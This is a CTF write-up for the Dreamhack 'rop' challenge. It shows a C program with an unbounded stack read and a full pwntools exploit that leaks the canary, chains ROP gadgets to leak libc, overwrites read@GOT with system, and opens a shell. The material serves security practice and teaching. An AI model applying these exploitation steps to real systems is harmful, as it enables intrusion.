[Dreamhack] rop Write-up

문제 분석

// Name: rop.c
// Compile: gcc -o rop rop.c -fno-PIE -no-pie

#include <stdio.h>
#include <unistd.h>

// Challenge entry point: two unbounded reads into a 0x30-byte stack buffer.
//
// Both read() calls accept up to 0x100 bytes while buf holds only 0x30, so
// each one can overwrite everything above buf in the frame: the stack
// canary, the saved rbp and the return address. The binary is built with
// -fno-PIE -no-pie (see the compile line above), so code addresses are
// fixed and do not need to be leaked.
//
// Returns 0; after the second read the function returns through whatever
// return address the input left on the stack.
int main() {
    char buf[0x30];

    // Unbuffered stdio so every prompt reaches the peer immediately.
    setvbuf(stdin, 0, _IONBF, 0);
    setvbuf(stdout, 0, _IONBF, 0);

    // Leak canary
    puts("[1] Leak Canary");
    printf("Buf: ");
    // read() does not NUL-terminate. If the input fills buf and overwrites the
    // byte that follows it (the canary's low 0x00 byte), the "%s" below keeps
    // printing until the next NUL and discloses the canary and anything after
    // it. Mitigation: bound the read to sizeof(buf) - 1 and NUL-terminate at
    // the returned length before printing.
    read(0, buf, 0x100);
    printf("Buf: %s\n", buf);

    // Do ROP
    puts("[2] Input ROP payload");
    printf("Buf: ");
    // Same unbounded read; once the canary is known, this one can rewrite the
    // saved rbp and the return address without tripping the stack protector.
    read(0, buf, 0x100);

    return 0;
}

Exploit code

from pwn import *

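# Target process and the two ELFs whose symbols the chain needs.
# The libc path is host-specific; point it at the libc shipped with the
# challenge when reproducing.
p = process("./rop")
e = ELF("./rop")
libc = ELF("/home/sung/dreamhack/rop/libc-2.27.so")
# Every address used below is either fixed by -no-pie (taken from `e`) or
# derived at runtime from the leaked read() address, so the stale hard-coded
# libc/stack addresses that used to sit here were dead and are dropped.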

def slog(name, addr):
    """Log a leaked address as ``<name>: 0x...`` through pwntools' success()."""
    return success(f"{name}: {hex(addr)}")

# --- [1] canary leak ---
# 0x38 bytes of filler reach the canary; the 0x39th byte replaces its low
# NUL byte so the printf("%s") in rop.c keeps printing past buf.
fill = b"A" * 0x39
p.sendafter(b"Buf: ", fill)
p.recvuntil(fill)
# Seven bytes of the canary follow the filler; its lowest byte is always
# 0x00 and is restored before unpacking.
leaked = p.recv(7)
canary = u64(b"\x00" + leaked)
slog("Canary", canary)

# --- [2] ROP chain: stage 1 leaks libc, stage 2 overwrites read@got ---
read_plt = e.plt["read"]
read_got = e.got["read"]
puts_plt = e.plt["puts"]
# Gadget addresses are constant because the binary is linked -no-pie.
pop_rdi = 0x4007f3       # pop rdi ; ret        (per its name)
pop_rsi_r15 = 0x4007f1   # pop rsi ; pop r15 ; ret

chain = [
    pop_rdi, read_got,           # puts(read@got): print read's libc address
    puts_plt,
    pop_rdi, 0,                  # read(0, read@got, rdx): rdx is not set by
    pop_rsi_r15, read_got, 0,    #   the chain, so the count is whatever rdx
    read_plt,                    #   holds at that point, not an enforced 0x10
    pop_rdi, read_got + 0x8,     # read@plt now resolves to system (after the
    read_plt,                    #   GOT overwrite); rdi -> the string written
]                                #   right after the GOT slot

# Stack layout: buf (0x38 bytes to the canary), canary, saved rbp, then the chain.
payload = b"A" * 0x38 + p64(canary) + b"B" * 0x8
payload += b"".join(p64(word) for word in chain)

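# --- [3] send the chain, derive libc addresses from the leak, finish ---
# Delimiter as bytes, consistent with the first sendafter() above.
p.sendafter(b"Buf: ", payload)
# puts(read@got) printed the significant bytes of read's libc address; the
# chain assumes the top two bytes are zero and pads them back for u64.
read_addr = u64(p.recvn(6) + b"\x00" * 2)
lb = read_addr - libc.symbols["read"]
system = lb + libc.symbols["system"]
slog("read", read_addr)
slog("libc base", lb)
slog("system", system)
# The stage-2 read(0, read@got, ...) is now waiting: the first 8 bytes replace
# read@got with system's address, the next 8 land at read@got+8, which the
# chain passed as rdi before its final read@plt call.
p.send(p64(system) + b"/bin/sh\x00")
p.interactive()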